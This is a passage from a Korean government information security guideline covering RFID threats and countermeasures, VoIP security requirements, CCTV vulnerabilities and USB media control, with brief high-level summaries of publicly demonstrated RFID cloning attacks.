쓰기를방지한다. 13) 4.2 패스워드보안기술참조 14) Gen2 는 Generration 2 를말한다. - 104 -
1 태그에저장된태그식별정보를추출하거나또는이를이용하여동일한태그를만드는것을말한다. 태그와리더기간통신을모니터링하는공격방법 (Eaves dropping) 도여기에속한다. 2 대응방안 - 태그저장정보의최소화 : UID 사용등 - 태그의접근 잠금패스워드사용 - 저장및소통정보의암호화 - 리더기인증 - Faraday Cage 15) 등물리적대책적용 나. 정보위 변조 1 태그에불법적으로접근하여태그에저장된정보르 fqus 형하거나정상적인태그로위장하는것을말한다. 태그에인가되지않은쓰기권한으로데이터를위조 (Falsifying contents) 하여정당한리더기를속이는공격방법이여기에해당한다. 2 대응방안 - 태그의접근 잠금패스워드사용 - 저장및소통정보의암호화 - 태그및리더기인증 다. 프라이버시침해 1 태그에저장된정보를이용하여위치를추적하거나, 정보의추출등으로개인정보가노출되는위협을말한다. 미국의시민단체인전자프라이버시정보센터 (EPIC, Electronic Privacy Information Center) 는프라이버시위협요인을다음과같이분류하고있다. 15) 전파를차단하기 dno 특정물질을사용하는기술이다.(4-1 참조 ) - 105 -
EPIC 의프라이버시위협요인분류 구 분 내 용 숨겨진태그 눈에쉽게띄지않는사물 장소에부착된태그 태그식별자유일성태그교유의속성으로인한소유자관련정보확인가능 대규모정보통합 태그정보및개인정보대상 DB구축 숨어있는리더기언제리더기에의해태그정보가읽혀지는지인식이어려움 개인추적 태그정보화개인정보가연계될경우개인의위치 성향추적가능 2 대응방안 - 태그의저장정보최소화 UID를사용할경우정보추출은예방할수있으나, 위치추적이가능하므로 UID를 주기적으로변경또는암호화하는등보호기술적용을권장한다. - 태그부착사실, 성질및기능, 기록정보, 기능제거방법, 리더기설치장소등의 표시 16) - 저장및소통정보의암호화 - 태그및리더기인증 - Faraday Cage 등물리적대책적용라. 물리적공격 1 태그, 리더기, 백엔드시스템등 RFID 시스템구성요소를파괴 제거 훼손등의방법으로시스템의기능을저해하는것을말한다. 인가되지않은명령으로태그를무력화시키거나태그가부착된물품에서물리적으로태그를분리하여다른물품에부착하는공격방법등이있다. 2 대응방안 - 리더기, 백엔드시스템을물리적으로안전한장소에설치및감시 - 훼손등에대비하여사전에백업시스템구성 마. 사이버위협 16) 방송통신위원회의 RFID 프라이버시보호가이드 (2005.7) 참조 - 106 -
1 웜 바이러스등에의한네트워크사의침해로, 정보가유출되거나시스템의정상작동을방해하는것을말한다. 2 대응방안 - 네트워크의중요도에따라분리 운영 - 최신백신의운용및주기적인보안패치실시 - 침입차단시스템 침입탐지시스템등안전성이확인된정보보호시스템운영 - 서버 PC 내불필요한서비스삭제 - 공유시스템자원 ( 공유폴더, 파일등 ) 에대한접근통제 2-2. RFID 공격사례 가. RFID 정보추출 복제 1 개요 : 2004 년독일의그룬발트가블랙햇 (BlackHat) 에서시연한사례로공개소프트웨어 (RF Dump) 와리더기를이용하여 13.56MHz 태그정보를추출하고복제하였다. 2 취약점 : 인터넷에서공개 S/W 입수가용이하고무선통신특성상태그와리더기간소통정보수집이가능하다. 3 보안대책 : 소통자료를암호화하거나리더기인증기술을적용한다. - 107 -
나. 의료용 RFID 복제 1 개요 : 2006 년 3월미국의 RFID 엔지니어조나단이자체제작한장비로 13.56MHz 태그 ( 미 Verichip 사제조 ) 와리더기간소통정보를복제하였다. 2 취약점 : 태그와리더기간소통정보수집이가능하고도청장비제작방법이인터넷에공개되는등관련기술입수가용이하다. 3 보안대책 : 소통자료를암호화하거나리더기인증기술을적용한다. 다. 자동차스마트키복제 1 개요 : 2005 년미국존스홉킨스대학과 RSA사가수행한공동프로젝트로저가의해킹장비로 13.56MHz 태그 ( 미 TI사제조 ) 의키를단 2시간만에해독후복제하여자동차운행및주유가가능함을시연하였다. 2 취약점 : 40bit의짧은암호키를적용하고있어해독이용이하다. 3 보안대책 : 안전성이검증된충분한길이의암호키를적용한다. - 108 -
라. 전자여권탐지및복제 1 개요 : 2006 년 7월블랙햇 (BlackHat) 에서그룬발트가전자여권의내용을추출하는한편암호키를해독하여특정국민을대상으로테러에악용될수있음을시연하였다. 2 취약점 : 무선통신특성상소통정보수집이가능하고전자여권에 50bit의짧은암호키를적용하여해독이용이하다. 3 보안대책 : 태그의송신출력을제한하여부당한리더기의접근을막고 Faraday Cage 기술을활용한알루미늄커버등으로전자여권내용의탐지를차단하는한편안전성이검증된충분한길이의암호키를적용한다. - 109 -
3. RFID 보안대책 3-1. 관리적보안대책 가. RFID 보안관리책임자지정ㆍ운영 1 RFID 시스템구축ㆍ운영관련보안관리책임자를지정한다. 2 RFID 시스템에접근할수있는사용자권한을설정 관리한다. 3 RFID 시스템운영ㆍ보안관리에대한정책을수립ㆍ집행하며정책의이행여부를점검한다. 4 RFID 구성요소별보안취약점을수시점검및관리한다. 5 RFID 사용자에대한보안교육을실시한다. 나. 사업수행업체에대한보안관리 1 계약체결을할때부터보안관리대책을수립한다. 2 사업에참여한인원과장비에대한보안관리방안을마련하고정기보안교육을실시한다. 3 사업에참여한인원에대해서는사업수행과관련하여직ㆍ간접으로취득한정보의유출ㆍ남용을방지하는보안서약서를징구한다. 4 승인된 USB 등휴대용저장매체나노트북을사용하도록하고, 사용시에는웜ㆍ바이러스감염여부를확인한다. 5 관련정보가인터넷등을통하여유출되지않도록하고, 사업종료시에는자료를회수하거나폐기하도록한다. 다. 백업체계의구축 1 RFID 시스템의재난및분실ㆍ탈취에대비한백업대책을수립한다. 2 백업시스템을구축할경우에는가급적원격지에구축한다. 3 재난및복구대책을정기적으로시험하고, 업무지속성에대한영향분석ㆍ평가를실시한다. - 110 -
4 비상시시스템복구를위하여시스템공급업체와유지보수계약을체결한다. 3-2. 물리적보안대책 가. 비인가자의접근통제 1 태그발급을위한발급기접근은인가된관리자에게만허용한다. 2 비인가자에의한리더기불법사용을방지하기위하여관리자지정, 지정된장소에보관등관리방안을수립한다. 나. 태그의관리 1 태그발급ㆍ변경ㆍ폐기에대한규정을수립한다. 2 인가자만이태그를발급 폐기하도록한다. 3 분실된태그의정보를삭제하는등분실에대비한보안대책을수립하도록한다. 4 태그를폐기하는경우물리적ㆍ전자적으로처리하여태그의재사용을방지한다. 3-3. 기술적보안대책 가. 태그정보의최소화 1 태그에저장ㆍ처리되는정보는해킹등을통해유출되더라도피해를줄일수있도록최소화한다. 2 제1항과관련구체적인정보를입력하는대신대체할수있는고유식별부호 (UID, Unique IDentification) 를활용할수있다. 다만, UID를사용할경우에도위치추적은가능하므로 UID를주기적으로변경하거나암호화하는등이에대한보안대책을강구한다. 나. 태그정보보호 1 접근ㆍ잠김등의패스워드를설정할경우에는추측이어려운패스워드를사용 - 111 -
한다. 2 태그정보사용이종료되거나폐기할경우에는 Kill 명령어를사용하여정보를소거, 재사용을방지한다. 3 태그정보의불법탐지를방지하기위하여알루미늄커버등특정물질을사용하는 Faraday cage 기술을사용할수있다. 4 인가된태그와리더기인지를확인하고태그정보를보호하기위하여안전성이확인된인증및암호화기술등을사용할수있다. 다만, 국가ㆍ공공기관의경우에는국가정보원장과사전에협의하여야한다. 무선구간에서의태그정보수집 분석을방지하기위한기술등사용 다. 백엔드시스템및네트워크보호 1 네트워크의운영을관리하기위하여사용자별업무의접근권한을차별화하여설정한다. 2 백엔드시스템에저장된정보를보호하기위하여침입차단시스템ㆍ침입탐지시스템등정보보호제품을활용한다. 3 원격에서관리자권한으로백엔드시스템에서의접근을원칙적으로금지한다. 4 원격에서일반사용자권한으로백엔드시스템에접근할경우에는안전성이검증된보안대책을강구한다. 다만, 국가 공공기관의경우에는국가정보원장과사전에협의하여야한다. 5 이동형리더기와백엔드시스템구간은안전성이검증된보안기술을적용한다. 다만, 국가 공공기관의경우에는국가정보원장과사전에협의하여야한다. 3-4. RFID 시스템구성예시 현재국내에서는다양한분야에서 RFID 사업이추진되고있다. 이와관련대표적인시스템구성에대한보안대책을예시하여안전한 RFID 시스템구축을지원하고자한다. - 112 -
가. 출입통제용 RFID 시스템을구성할경우 암호화가필요없는경우 1 용도 : 단순출입통제 출입통제의경우도필요시암호화 2 태그규격 : 13.56MHz ISO/IEC 15693/18000-3 스마트카드 3 보안대책 : 태그위조ㆍ복제방지를위한패스워드사용 [ 예시구성도 1] 암호화가필요한경우 1 용도 : 전자여권, 전자신분증 2 태그규격 : 13.56MHz ISO/IEC 14443/15693 스마트카드 3 보안대책 - 태그의정보추출및위조 복제방지를위한암호사용 국가ㆍ공공기관은국가정보원장이승인한암호논리적용, 민간부문은상용암호사용 - 113 -
- 프라이버시보호를위한리더기인증및 Faraday cage 적용 [ 예시구성도 2] 나. 전자지불용 RFID 시스템을구성할경우 1 용도 : 교통카드, 복지카드등 2 태그규격 : 13.56MHz ISO/IEC 14443/15693 스마트카드, 2.45GHz ISO/IEC 18000-4 3 보안대책 - 금융정보는태그에저장하지않으며백엔드시스템에저장 - 태그의정보추출및위조ㆍ복제방지를위한암호사용 - 프라이버시보호를위한리더기인증및 Faraday cage 적용 [ 예시구성도 3] - 114 -
다. 중요물자관리용 RFID 시스템을구성할경우 1 용도 : 무기관리, 비밀문서관리등 2 태그규격 : 900MHz ISO/IEC 18000-6, EPCglobal Class1Gen2 등 3 보안대책 - 태그에입력하는정보의최소화 - 프라이버시보호를위한 Faraday cage 적용 [ 예시구성도 4] - 115 -
4. RFID 보안기술 4-1. 물리적보안기술 가. Faraday Cage 1 전파의발산을차단하는특수물질로만든용기를이용하여태그를감싸는방법이다. 2 정당하지않은리더기가태그정보를읽는것을막기위하여알루미늄이나은박지등의금속또는망으로만들어진용기에태그를넣어보관하거나이동한다. 나. Active Jamming 1 강력한방해전파를발산하는기기를이용하여기기근처에있는모든 RFID 리더기의작동을방해하는기술로태그정보의유출을차단하기위하여한시적으로사용할수있다. 2 이기술은원래정상적인태그와리더기간통신을방해하는공격기술로사용되고있지만역으로근처에있는정당하지않은리더기에의해태그정보가노출되는것을막기위한방어기술로도이용가능한방법이다. - 116 -
다. Kill 명령어 1 리더기에서패스워드 (8bit) 를포함한 Kill 명령어를전송하여태그의기능을정지시키는기법으로사용자의프라이버시를보호하기위해사용하는가장일반적인방법이다. 2 그러나, Kill 명령어가적용된후에는재사용이안되기때문에제한적인환경에서만적용이가능하다. 예를들어, 상품판매후에는 Kill 명령어를통해태그의동작을중지시킴으로써프라이버시를보호할수있지만반품의경우에는작동이되지않는단점이있다. 라. Blocker 태그 1 의미없는신호를발생하여주변태그의통신을방해하는특수태그로정당하지않은리더기에의한태그정보유출을차단하기위하여사용한다. 2 예를들면, 태그부착의의약품구입시 Blocker 태그를사용한용기에의약품을넣으면어떤리더기라도태그정보를읽을수없어의약품구입등의개인정보를보호할수있다. 마. Clipped 태그 1 태그내부의안테나연결선을일부절단시킴으로써태그의통신거리를줄이는방법으로 Kill 명령어의단점을보완하기위하여개발된태그이다. 2 이기술을적용할경우태그의정보저장기능은그대로유지한채정보송신거리를대폭줄임으로써원거리에서위치추적등을통한프라이버시침해가능성을줄일수있다. 4-2. 패스워드보안기술 가. 접근패스워드리더기가태그정보를읽으려고하는경우패스워드가일치하지않으면응답하지않음으로써태그의정보유출을차단하는기술이다. - 117 -
나. 잠금패스워드 태그의특정정보만을보호하기위하여그부분만패스워드를설정하는기 술로불법리더기에의한정보유출을차단하는기술이다. 다. Kill 패스워드태그를더이상사용할필요가없을경우에는패스워드를통해 Kill 명령어를적용하는방법이다. 이는 Kill 명령어를적용할경우재사용이안되기때문에 Kill 명령어실행시다시한번확인하기위함이다. 4-3. 암호화보안기술 가. 인증 1 인증이란일반적으로패스워드, 공개키암호, 생체정보등을이용하여상대개체의정당성을식별하는기술로써 RFID 시스템에서는태그와리더기의정당성확인등에적용된다. 2 인증방법으로는태그가정당한리더기인지를확인하거나리더기가정당한태그인지를확인하는방법, 태그와리더기간상호인증하는방법등이있다. 3 안전성측면에서보면태그와리더기간상호인증하는방식이가장좋으며태그의위 변조방지, 불법리더기를이용한태그정보추출을차단할수있다. 4 현재비접촉식스마트카드 (13.56MHz) 의경우주로 Challenge-Response 방식의인증기술이적용되고있다. 5 수동형태그에는메모리와컴퓨팅능력제한등으로인하여인증기술이보편적으로적용되지못하고있다. 현재경량화된해쉬함수를이용하는인증기술이연구되고있으며태그에식별정보를직접저장하지않고태그제작시디지털회로의신호출력값을고유식별정보로활용하는태그복제방지기술도활용되고있다. - 118 -
나. 암호화 1 중요정보를보호하기위하여평문내용을제3자가알아볼수없도록변환시키는기술로블록암호, 스트림암호등을이용한다. 2 블록암호란정보를일정크기의블록단위로암호화하는기술로 AES, 3-DES 등이널리사용되고있으며국내에는 SEED가상용표준으로제정되어있다. 3 현재비접촉식스마트카드는블록암호를이용한보안기술의적용이가능하며국가기관에서사용하기위해서는 국가기관용표준암호 탑재가필요하다. 4 스트림암호는랜덤넘버라불리는난수열을이용하여평문내용을비트 (bit) 또는문자단위로암호화하는기술로일반적으로는암호화속도가블록암호에비해빠르다고할수있다. 최근에는극소형의 RFID 칩에서동작이가능한경량화된스트림암호개발 적용노력이진행되고있다. - 119 -
< 붙임 > RFID 보안점검표 단계점검사항확인비고 1. RFID 시스템구축 운영관련보안관리책임자르지정하였는가? 2. 사업계획서에소통정보를정의하고보안대책을포함하였는가? 3. RFID 시스템에접근할수있는사용자권한을차별화설정하였는가? 4. 태그발급을위한발급기접근은인가된관리자에게만허용하였는가? 5. 태그발급 변경 폐기에대한규정 ( 필요시태그관리포함 ) 을수립하였는가? 사업계획 사업설계 6. 리더기의관리자지정, 지정된장소에보관등의관리방안을수립하였는가? 7. 백엔드시스템에대한해킹 바이러스방지대책을강구하였는가? 8. 백엔드시스템의재난및분실 탈취에대비한백업대책을수립하였는가? 9. 프라이버시보호정책을수립하였는가? 10. 국가정보원과사전협의하여보안대책의적절성을확인하고, 필요시보안성검토를의뢰하였는가? 11. 사업수행업체선정시, 제시된보안대책을구현할수있는지를검토하였는가? 1. 사업수행업체의사업에참여한인원과장비에대한보안관리방안을마련하였는가? 2. 사업에참여한업체인원에대해서보안서약서를징구하였는가? 3. 태그에저장 처리되는정보는해킹등을통해유출되더라도피해를줄일수있도록태그정보를최소화하였는가? 4. 접근 잠김등의패스워드설정시추측이어려운패스워드를사용하였는가? 5. 네트워크의운영을관리하기위하여업무에따른접근권한을차별화하여설정하였는가? 6. 백엔드시스템저장정보를보호하기위하여침입차단시스템등안전성이검증된정보보호제품을활용하였는가? 7. 이동형리더기와백엔드시스템구간은안전성이검증된보안기술을적용하였는가? 8. 보안아키텍처개발내용이국가정보원의보안성검토결과와부합하는지를확인하였는가? 9. 보안아키텍처에적용되는암호논리나정보보호시스템이국가정보원승인을받았는지를확인하였는가? - 120 -
10. 보안아키텍처개발사안에대한테스트계획을수립하였는가? 1. 국가정보원장이승인한정보보호시스템및안전성을확인한네트워크를구축하였는가? 2. 백업시스템을원격지등안전한장소에구축하였는가? 사업구축 테스트및이행 운영및유지관리 3. 보안교육과운영계획을수립하고관련운영 보안관리지침을마련하였는가? 4. 사업수행업체에게인가된 USB 등보조기억매체나노트북등관련장비를사용하도록보안조치하였는가? 5. 사업수행업체에게인터넷등을통하여관련정보가유출되지않도록보안조치하였는가? 6. 사업종료시에는사업수행업체로부터자료를회수하거나폐기하도록하였는가? 1. 수립된계획에따라시스템구성요소별로세부보안취약점을점검하였는가? 2. 모의침투테스트를수행하였는가? 1. 보안관리책임자는 RFID 시스템운영과관련하여보안정책의적정성을지속검토 보완하고있는가? 2. 인가자가태그를발급 폐기하고태그의발급기 리더기관리를적절히수행하고있는가? 3. 태그를폐기하는경우물리적 전자적으로처리하여태그의재사용을방지하고있는가? 4. 태그정보사용이종료되거나폐기할경우에는 Kill 명령어를사용하여정보를소거, 재사용을방지하고있는가? 5. 관리자권한으로의시스템의원격접근을제한하고있는가? 6. RFID 구성요소별취약점을수시점검및관리하고있는가? 7. 6 항의경우필요시국가정보원에안전측정을의뢰하였는가? 8. RFID 시스템의일부또는전체를변경하는경우에는국가정보원장과협의하여보안성검토를받았는가? 9. RFID 시스템의안정적인운영을위하여주기적인교육및훈련을실시하고있는가? 10. 재난및복구대책을정기적으로시험하고, 업무지속성에대한영향분석 평가를실시하고있는가? 11. 비상시시스템복구를위하여시스템공급업체와유지보수계약을체결하고있는가? - 121 -
[ 부록 9 ] 인터넷전화구축시보안준수사항 - 122 -
1. 보안성검토의뢰가. 각급기관은인터넷전화시스템을도입ㆍ구축하거나민간인터넷전화사업자망 (070) 을사용하고자할경우 전자정부법, 국가정보보안기본지침, 교육과학기술부정보보안기본지침 등에의거, 사업계획단계에서보안성검토의뢰나. 또한, 인터넷전화기ㆍ침입방지시스템등보안기능이포함된모든제품은 CC인증을득한제품도입 2. 강력한인증및암호화구현가. 다양한인터넷전화보안위협속에서안전한인터넷전화를사용하기위해서는인터넷전화기에대한정확한인증과제어신호및통화내용에대한효과적인암호화가선행나. 국가 공공기관에서사용해야할인증과암호화표준은아래 < 표 1> 에제시 구분방법 장치인증 PKI 사용자인증 HTTP Digest (RFC 2617) 제어신호암호화 통화내용암호화 보안프로토콜암호화알고리즘키관리방법보안프로토콜암호화알고리즘메시지인증키관리방법 TLS v1.0(rfc2246), v1.2(rfc5246) 국제표준알고리즘 PKI SRTP (RFC3711) 국제표준알고리즘 HMAC-SHA1 (RFC2104) SDES (RFC4568) 1 장치인증 o 인가된인터넷전화장비 ( 전화기, 교환기서버등 ) 간제어신호및음성데이터송수신이전, 단말 기식별및유효성확인을위해상호간장치 (Device) 인증실시필요 o 국가ㆍ공공기관에납품되는인터넷전화장비는국가가지정또는구축ㆍ운용하는 - 123 -
국가ㆍ공공기관용공개키기반장치인증체계 (PKI) 에서발급된장치인증서사용필 요 2 사용자인증 o 인가된사용자에게인터넷전화사용을허가하기위한주체확인및식별df 통한접근제어를수행 o 사용자인증을위하여국제표준인 HTTP Digest 프로토콜을적용하여인증받은사용자만이인터넷전화사용조치 [ 그림 1] HTTP Digest를이용한사용자인증절차 o 사용자가서비스를사용하기위해서버에등록요청 (REGISTER) 메시지를전송하면, 서버는사용자에게사용자인증을위한정보를응답메시지 (401 Unauthorized) 에포함하여전송 o 사용자는서버로부터전송된메시지에포함된인증키값과 User ID, Password 를이용하여인증값을생성한후, 그결과를등록요청메시지에포함하여재전송하면, 등록서버는인증값일치여부를통해사용자인증 3 제어신호암호화 o 인터넷전화서비스의트래픽유형은단말등록및호처리에이용되는제어신호 (SIP 프로토콜 ) 와음성통화 (RTP 프로토콜 ) 로구분 o 제어신호는등록정보와호설정정보가담겨있어외부로유출될경우도청이나서비스오용등의공격에악용되므로암호화를통한보호가필수적 제어신호는홉간 (Hop-by-hop) 으로전달되기때문에, [ 그림 2] 와같이모든홉간에는 TLS 프로토콜을반드시적용 - 124 -
[ 그림 2] 제어신호보호를위한 TLS 적용구간 o TLS 프로토콜은클라이언트와서버사이에인증및암호화통신을위해사용되는프로 토콜로서이를사용하기위해지원해야할암호규격임 구분 암호규격 암호화알고리즘 해쉬함수 운영모드 국제표준알고리즘 SHA-1, SHA-256 CBC (Cipher Block Chaining) 키교환알고리즘 RSA(1024 또는 2048 비트 ) Crypto Suites TLS_RSA_WITH_AES_128_CBC_SHA = {0x00,0x2F} TLS_RSA_WITH_SEED_128_CBC_SHA = {0x00, 0x96} 4 통화내용암호화 o 통화내용암호화를위해서는국제표준에서제시하고있는 SRTP(Secure Real-time Transport Protocol) 프로토콜을반드시적용 SRTP는음성트래픽의기밀성, 메시지인증및재전송방지등의보안서비스를제공하는표준프로토콜 [ 그림 3] SRTP를이용한통화내용암호화 - 125 -
o SRTP 를사용하기위해필수로지원해야할암호규격은 < 표 3> 과같음 구분 암호규격 암호화알고리즘인증운영모드키길이 국제표준알고리즘 HMAC/SHA1, HMAC/SHA256 CM(Counter Mode) 마스터키 : 128 bits, 세션암호화키 : 128 bits 세션인증키 : 160 bits, 세션 salt키 : 112 bits 3. 기관외부구간보안대책 가. 인터넷전화서비스사업자이행보안대책 o 서비스를제공하는모든구간에강력한인증과암호화기능제공 ( 보안기능이없는단말기와보안통신제공 ) o 서비스환경의보안위협을최소화할수있도록전화망과전산망의분리를포함한안전한네트워크및시스템구축 o 인터넷전화서비스이용자의신원확인및접근제한정책수립 - 126 -
o 웜 바이러스등악성코드탐지ㆍ차단및장애발생에따른대비책수립 o 인터넷전화사용자의개인정보보호대책강구등 나. 국가ㆍ공공기관의서비스사업자망사용제한 o 내ㆍ외부망 (All IP) 의인터넷전화를안전하게사용하기위해서는전구간에대한보안대책적용이필수적인바, 국가ㆍ공공기관은사업자구간의보안서비스제공시까지 [ 그림 4] 처럼기관내부는인터넷, 외부는 PSTN을사용하는제한된형태의인터넷전화서비스만사용 [ 그림 4] 기관내부에서허용되는인터넷전화형태 o 향후인터넷전화서비스사업자가보안대책을만족하는보안서비스를제공할경우외부 구간사용허용 4. 인터넷전화망과전산망의분리가. 인터넷전화서비스를안전하게제공하기위해서는 [ 그림 5] 와같이전화망 ( 음성네트워크 ) 과전산망 ( 데이터네트워크 ) 을분리하여운영나. 물리적으로분리하는방법도가능하지만경제성등을고려할때 VLAN을사용하는방식을권장 - 127 -
[ 그림 5] VLAN 을이용한전화망과전산망의분리 1 VLAN 구성방안 VLAN을구성하는방법에는 1 포트기반, 2 장비의 MAC 주소기반 3 IP주소기반, 4 IEEE 802.1Q 등을이용하는방법이있음 2 VLAN간데이터교환방안해당기관에서전화망과전산망의데이터교환은기본적으로금지해야하나, 일부서비스제공을위하여데이터교환이필요할경우, 국가정보원과사전협의후 3계층스위치의접근제어나방화벽등의필터링대책을적용하여시행가능 5. 인터넷전화전용보안장비도입가. 인터넷전화및교환장비대상해킹 DDoS공격등을탐지 차단하기위해서인터넷전화전용침입차단 탐지시스템사용나. 인터넷전화트래픽모니터링및보안장비관리를위한보안관리시스템사용 6. 백업체계구축 가. 이중화구성및 UPS 구축 나. 기존유선전화일부회선유지 7. 인터넷전화시스템보안관리 - 128 -
가. 소프트폰사용금지나. 무선네트워크및이동근무자의인터넷전화접속금지다. 소프트웨어보안업데이트 o 인터넷전화단말기및교환장비의펨웨어, 소프트웨어등을주기적으로갱신라. 웹기반원격관리보호 o 관리자가원격접속시암호화등원격채널보호기술적용마. 사용자계정관리 o 인터넷전화단말기및교환장비에디폴터패스워드는반드시변경하고주기적으로패스워드변경필요바. 인터넷전화단말기및교환장비 (IP-PBX 등 ) 에대한접근제어적용사. 감사및로그관리아. 데이터백업및복구자. 보안대책및운영계획수립 - 129 -
[ 부록 10 ] CCTV 보안취약점및보안대책 - 130 -
1. 보안취약점 가. 동축케이블해킹 o 카메라와비디오서버간연결된동축케이블중간을절취, 영상정보가외부에유출 나. CCTV 카메라 ( 비디오서버 ) 해킹 o 네트워크에연결된카메라 ( 비디오서버 ) 의시스템취약점을활용, 조작및영상 정보외부유출 카메라 ( 비디오서버 ) 는일반적으로 Embeded Linux 기반의 OS 가탑재되었으나보안조치없이초기상태로설치되어외부해킹에취약 - 131 -
다. CCTV 관제센터간영상자료절취 o 카메라 ( 비디오서버 ) 와관제센터간소통자료를스니핑, 코덱 (codec) 분석후복 구하여영상정보유출 라. 관제센터보안관리부실로인한취약사항 o 관제센터서버가인터넷에연결된상태로운영되며서버ㆍ관제인력 PC 등의보안관리취약으로해킹및자료유출가능 o CCTV 시스템과내부망 ( 정부행전망등 ) 연결시내부시스템또는타기관공격경로로악용가능 2. 보안대책가. 관리적보안대책 o 외부에 CCTV 설치시카메라, 중계서버는비인가자의임의조작이물리적으로불가능하도록위치하거나시건장치를설치 o 전송회선의절단, 도청, 손상등을방지하기위하여매설및보호도관 (Conduit) 설치 - 132 -
o CCTV 상황실은보호구역으로지정관리하고출입통제장치도입 o CCTV, DVR(Digital Video Recorder), 출입통제장비등의정상작동여부및보안관리상태에대하여주기적인점검실시 o 관계법령에근거, 영상기록의임의열람및사적활용방지대책을마련하고, 저장매체는비인가자의접근이불가능하도록시건장치가설치된통제구역에보관 o 자체망구성이불가능할경우외부경비서비스를활용하되중요도가떨어지는소규모시설에한하며장기적으로자체망설치고려 o 경비서비스제공업체에대하여주기적인보안점검을실시하며보안관리에대한보장내역을계약서에명시 o 각급기관은 CCTV시스템구축시국가정보원보안성검토확행 나. 기술적보안대책 o 카메라, 비디오서버, 관제서버, 소통망은업무망및인터넷망과분리, 별도단독망구성을원칙 [ 단독망구성 ] - 133 -
o 원격지감시등의단독망구축불가시에는전용회선을사용 - 부득이한사유로인터넷을활용할경우중간스니핑을통한영상자료유출을방지하기위하여원격지카메라 ( 비디오서버 ) 관제서버종단간 VPN 설치등을통한자료암호화소통 - 관제시스템이운용되는영역으로의접근은별도의침입차단시스템을통해접근차단 [ 인터넷연동구성 ] o 비인가자의카메라 ( 비디오서버 ) 접근을방지하기위하여 Telnet 등원격접근서비스차단설정, 접근가능 IP제한 ( 관제용서버 IP로한정 ), 디폴트패스워드변경, 카메라 IP 외부공개금지등보안조치 o 업무망내시스템과자료교환필요시, CCTV 시스템망ㆍ업무망앞단침입차단시스템을각각활용, 특정 IPㆍ포트만접속토록설정 o 관제시스템및관리용 PC는계정ㆍ비밀번호나생체인식등을통해접근통제가되어야하며, 원격에서의접근통제를위해 IPㆍMAC 등을활용 관제시스템ㆍ관리용 PC는최신백신설치ㆍ비인가 USB메모리사용금지등보안조치 - 134 -
[ 부록 11 ] USB 보안관리강화대책 - 135 -
USB 메모리등보조기억매체관리실태일제점검 기술발전에따라 USB 메모리가점차대용량ㆍ소형화추세로분실위험이높고, 분실시대량의중요자료유 출우려 o USB 메모리등보조기억매체는일반ㆍ비밀용으로구분, 휴대용저장매체관리대장에등 록후사용하고주기적으로분실여부및보관상태를확인ㆍ점검 ( 월 1 회 ) o 각급기관에등록된 USB 메모리저장자료일제점검, 업무목적이외불필요자료삭제 정보보안담당관ㆍ USB 관리책임자, 보조기억매체에대한예방보안활동적극전개 정보보안담당관ㆍ휴대용저장매체관리책임자가저장자료에대한보안성검토없이형식적으로반출승인, 업무목적과무관한중요자료반출 o 각급기관의휴대용저장매체는각과 ( 팀 ) 장책임하에관리하는것을원칙으로하며소속직원이미등록휴대용저장매체를사용하거나허가없이반출하지않도록지도ㆍ감독철저 o 각급기관은그소속직원에대해공지ㆍ교육등을통해휴대용저장매체의임의사용을제한하고 사이버 보안진단의날 ( 매월세번째수요일 ) 등을통해주기적으로점검 o 정보보안담당관은소속기관내에사용하는휴대용저장매체등록현황등보안관리상태를감독하고비밀보관휴대용저장매체를분실하거나무단반출한경우에는경위조사를실시 비밀유출이우려되거나유출징후가있는경우에는관계기관에즉시보안사고조사의뢰 USB 를통한자료반ㆍ출입통제강화 USB 를반출 입할경우승인권자의업무편의등을위해승인기간과다지정, 저장자료보안성검토미실시 등부적절한 USB 보안관리사례산견 o 등록된 USB 메모리의개인소지를금지하고 USB 반ㆍ출입허용기간은출장기간등사용 - 136 -
목적에따라최소기간으로한정하여승인 o 자료반출 입승인권자 ( 정보보안담당관 ) 는사용자가반출 입요청한자료목록확인및보안성검토확행, 업무상목적이외중요자료반출사전차단 o USB 관리자는사용자별 USB 등록및반ㆍ출입자료목록등 USB 사용과관련된각종기록철저 o 승인된 USB를자택등외부에서사용할경우사용PC ㆍ노트북등에대해악성코드감염여부점검실시, 해킹에의한자료유출방지 o 외국정부등외부기관으로부터 USB를통해자료를제공받은경우에도백신S/W 이용, 악성코드감염여부확인후사용 기관별환경에맞는 USB 보안관리강화추진 일부지자체ㆍ공공기관은사용불편ㆍ예산미확보등의이유로 USB 관리시스템도입에소극적, 해킹및 사용자부주의로인한중요자료유출사고발생 o USB 관리시스템 미도입기관은정보화사업추진시 보안USB 도입사업을우선반영, 시스템조속도입ㆍ운용 일반 USB메모리를사용자인증, 저장자료암호화등안전성이검증된 보안USB 로조속교체, 보안사고사전예방 - 137 -
< USB 관리시스템도입절차 > 1) 보안 USB 미도입기관은정보화사업추진시우선적으로 USB 관리시스템 도입사업추진 2) 정보화사업담당자는 USB 관리시스템 도입사업에대한 보안성검토 를교육과학기술부장관및시 도교유감을통해국가정 보원에요청 3) IT보안인증사무국 의국가기관도입가능제품목록을확인, 등재된제품을도입 * 홈페이지 : http://service2.nis.go.kr, 문의전화 : 02-3412-3380 o USB 관리시스템 도입전까지는 PMSㆍ자산관리시스템등여타보안S/W 의매체통제기능을적극활용, 비인가 USB메모리통제강화 o USB 저장자료는파일단위로비밀번호를설정, 분실및유출에대비 o 인터넷ㆍ업무망분리기관은망간자료전송시 USB를대체할일방향전송장비등을활용한안전한업무망 인터넷자료전송체계강구 국가ㆍ공공기관업무망과인터넷간안전한자료전송가이드라인 참조 ( 10.9 배포 ) USB 무단반ㆍ출입등보안규정위반으로인한사고시엄중문책 업무자료가저장된 USB 를승인없이무단으로반출하여자택에서사용하다악성코드에감염되어중요자료 가유출되는사고지속발생 o USB 메모리등휴대용저장매체를통한보안사고유발시국가중요자료대량유출등파급영향에대한교육주기적실시, 경각심제고 o USB 무단반출 입등보안관련규정위반으로인한보안사고시 공무원징계령 등관련법령엄격적용, 보안기강확립 - 138 -
[ 부록 12 ] 메일서버운용시보안관리강화방안 - 139 -
